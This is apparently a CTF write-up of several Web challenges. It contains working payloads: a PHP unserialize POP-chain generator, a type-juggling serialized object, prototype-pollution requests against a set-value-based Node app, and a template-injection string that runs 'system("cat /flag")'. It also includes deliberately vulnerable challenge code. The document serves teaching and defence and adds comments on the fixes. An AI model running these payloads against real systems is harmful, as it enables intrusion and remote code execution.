划水的国赛Web
babyunserialize
www.zip源码泄露
参考 http://blog.ccreater.top/ wmctf 2020 webweb
<?php
// Stand-alone PoC generator reproduced in the write-up. It declares stub classes whose
// namespaces, names and property names mirror those of the target application (the real
// framework code is not on this page), builds an object graph from them and prints the
// URL-encoded serialize() output that is sent to the challenge's unserialize() sink.
// Defensive takeaway: the root cause is unserialize() on attacker-controlled input; pass
// ['allowed_classes' => false] (or a strict allow-list) or switch to json_decode() so no
// application class can be instantiated from request data.
namespace DB {
    // Stub of the target's abstract cursor; only the class name / interface matter for serialize().
    abstract class Cursor implements \IteratorAggregate {}
}
namespace DB\SQL {
    class Mapper extends \DB\Cursor {
        // Property names and values chosen to match what the target's Mapper reads back after
        // unserialize(); their meaning inside the framework is not visible here — confirm against
        // the framework source before relying on this description.
        protected $props = ["quotekey" => "call_user_func"], $adhoc = ["phpinfo" => ["expr" => ""]], $db;
        // Empty bodies: these methods exist only so the stub is instantiable (IteratorAggregate
        // requires getIterator()); they are never executed by this script.
        function offsetExists($offset) {}
        function offsetGet($offset) {}
        function offsetSet($offset, $value) {}
        function offsetUnset($offset) {}
        function getIterator() {}
        function __construct($val) {
            // $db holds whatever is passed in; below it is another Mapper, so the chain nests.
            $this->db = $val;
        }
    }
}
namespace CLI {
    class Agent {
        protected $server = "";
        public $events;
        public function __construct() {
            // "disconnect" maps to a [object, "find"] callable-shaped array.
            $this->events = ["disconnect" => array(new \DB\SQL\Mapper(new \DB\SQL\Mapper("")), "find")];
            // Self-reference: serialize() encodes this as a back-reference to the Agent itself.
            // Presumably needed by the consuming code; the framework side is not shown here.
            $this->server = &$this;
        }
    };
    // Marker class; serialized alongside Agent in the output array.
    class WS {}
}
namespace {
    // Emits the payload in a form that can be pasted straight into a query string.
    echo urlencode(serialize(array(new \CLI\WS(), new \CLI\Agent())));
}
easyphp
迭代使用call_user_func调用pcntl函数致使异常
| http://eci-2zed3ztpomt9kf7xbbng.cloudeci1.ichunqiu.com/?a=call_user_func&b=pcntl_wait
easytrick
源码如下
<?php
// Challenge source as shown in the write-up. The class is intentionally weak: it mixes a
// partial string cast, byte-length checks and loose (==) comparison, which together let two
// values of different PHP types satisfy every branch.
class trick{
    public $trick1;
    public $trick2;
    public function __destruct(){
        // Only trick1 is normalised to a string. trick2 keeps whatever type the unserialized
        // payload supplied, so the strict !== below compares a string against a non-string.
        $this->trick1 = (string)$this->trick1;
        // strlen() measures bytes and implicitly converts trick2 to a string for the check;
        // a non-string trick2 is therefore measured by its string form, not its raw value.
        if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){
            die("你太长了");
        }
        // !== is true whenever the types differ; md5() again stringifies trick2; != is a loose
        // comparison with PHP's type-juggling rules. Had all three used === on two explicit
        // strings, the condition could not hold without an actual MD5 collision.
        if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){
            echo file_get_contents("/flag");
        }
    }
}
highlight_file(__FILE__);
// SECURITY: unserialize() on raw query-string input. Outside a deliberately vulnerable
// challenge this should be unserialize($input, ['allowed_classes' => false]) or json_decode().
unserialize($_GET['trick']);
弱类型判断绕过
| O:5:"trick":2:{s:6:"trick1";i:1;s:6:"trick2";d:0.9999999999999999;}
littlegame
查看package.json,发现set-value存在原型链污染 https://www.anquanke.com/vul/id/1715582
| { "name": "littlegame", "version": "1.0.0", "private": true, "scripts": { "start": "node ./bin/www" }, "dependencies": { "cookie-parser": "~1.4.4", "debug": "~2.6.9", "express": "~4.16.1", "express-session": "^1.17.1", "morgan": "~1.9.1", "set-value": "^3.0.0" } }
在index.js找到flag接口
// Excerpt of the challenge's index.js (the "..." gaps are elided in the write-up).
// Admin is a plain object literal, so a bracket lookup on it also resolves properties
// inherited from Object.prototype, not just the three declared passwords.
const Admin = {
    "password1":process.env.p1,
    "password2":process.env.p2,
    "password3":process.env.p3
}
...
// Flag endpoint: compares the request-supplied password against Admin[key], where key is
// taken verbatim from the request body. Defensive fix: check own properties only, e.g.
// Object.prototype.hasOwnProperty.call(Admin, key), or store the credentials in a Map /
// Object.create(null) object so prototype entries can never match.
router.post("/DeveloperControlPanel", function (req, res, next) {
    if (req.body.key === undefined || req.body.password === undefined){
        res.send("What's your problem?");
    }else {
        let key = req.body.key.toString();
        let password = req.body.password.toString();
        if(Admin[key] === password){
            res.send(process.env.flag);
        }else {
            res.send("Wrong password!Are you Admin?");
        }
    }
});
...
// Session-mutation endpoint: writes a request-supplied value at a request-supplied dotted
// path inside the session's knight object. setFn is presumably set-value's set()
// (package.json on this page pins set-value ^3.0.0) — confirm. Any path-based setter must
// reject "__proto__", "constructor" and "prototype" segments, or the write can land on the
// shared Object.prototype instead of the session object.
router.post("/Privilege", function (req, res, next) {
    if(req.session.knight === undefined){
        res.redirect('/SpawnPoint');
    }else{
        if (req.body.NewAttributeKey === undefined || req.body.NewAttributeValue === undefined) {
            res.send("What's your problem?");
        }else {
            let key = req.body.NewAttributeKey.toString();
            let value = req.body.NewAttributeValue.toString();
            setFn(req.session.knight, key, value);
            res.send("Let's have a check!");
        }
    }
});
构造如下exp:
| http://eci-2ze2t1c804gx9bfude7s.cloudeci1.ichunqiu.com:8888/Privilege POST NewAttributeKey=__proto__.password4&NewAttributeValue=tyao
http://eci-2ze2t1c804gx9bfude7s.cloudeci1.ichunqiu.com:8888/DeveloperControlPanel POST key=password4&password=tyao
rceme
参考https://blog.csdn.net/qq_45708109/article/details/107645816
可以绕过的函数有很多,这里使用hex2bin
| ?a={if:var_dump((hex2bin(%27706870696e666f%27))())}Tyao{end%20if}
?a={if:var_dump(((hex2bin(%2773797374656d%27))(%27cat%20/flag%27)))}Tyao{end%20if}